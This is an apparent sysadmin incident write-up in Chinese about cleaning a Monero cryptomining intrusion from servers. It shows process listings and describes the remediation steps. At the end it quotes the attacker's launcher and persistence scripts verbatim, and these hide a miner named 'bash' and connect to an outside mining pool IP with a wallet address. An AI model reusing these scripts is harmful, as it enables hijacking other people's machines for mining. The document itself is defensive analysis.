早上。 开发反应对外客户服务器环境异常 空间存储异常 90个G的空间莫名其妙少了70个G TOP进程异常 多了一个MD和一个BASH为名的进程 分别跑了90-110的cpu 感觉像是系统正常进程 问了开发 开发表示不是正常业务程序,所以百度了进程中的IP地址。发现是一个常见的挖矿入侵IP,根据入侵IP百度得知是门罗币挖矿程序。

根据PID找到该进程 [root@bogon ~]# ps -ef|grep 46413 root 46413 1 99 Jan08 ? 56-04:22:04 -bash -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x root 80119 79985 0 10:06 pts/1 00:00:00 grep 46413 [root@bogon ~]# ps -ef|grep 47002 root 47002 1 95 Jan08 ? 53-22:30:57 bash -c 1 -t 2 -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:x@198.251.81.82:3333/xmr

根据之前遭遇过比特币挖矿程序入侵案例处理经验,首先Kill掉这两个进程,然后查看定时任务中的陌生任务并做清理 清理完成后 存储空间恢复正常 CPU恢复正常

第二天会再次查看 如果进程再次出现,根据其他挖矿程序处理经验:找出执行文件取消执行授权 ,删掉文件, 清理进程,清理定时任务 (操作顺序不要乱) 如果还是异常 清理掉文件后 更换root密码 开启防火墙对入侵Ip做限制 找出其入侵方式并做相对防御

当天下午记录:出现这种问题最好排查整个网段的机器 这次的程序入侵就在整个网段的机器中都发现了 都做了清理

如果还想做安全防御方面的工作:除了开启防火墙更换root密码外 还可以 排查陌生用户账号密码 针对入侵方式做研究(是业务程序有漏洞还是用的服务工具有漏洞) 避免再次被入侵

以下是这个程序涉及的脚本文件供参考(说实话Low的一B) 脚本一:vim ./run #!/bin/bash

proc=nproc ARCH=uname -m HIDE=”bash”

if [ “$ARCH” == “i686” ]; then ./h32 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:x@198.251.81.82:3333/xmr >>/dev/null & elif [ “$ARCH” == “x86_64” ]; then ./h64 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:x@198.251.81.82:3333/xmr >>/dev/null & fi echo $! > bash.pid

脚本二:vim /tmp/hsperfdata_data_root/upd #!/bin/sh if test -r /tmp/hsperfdata_data_root/bash.pid; then pid=$(cat /tmp/hsperfdata_data_root/bash.pid) if $(kill -CHLD $pid >/dev/null 2>&1) then exit 0 fi fi ./run &>/dev/null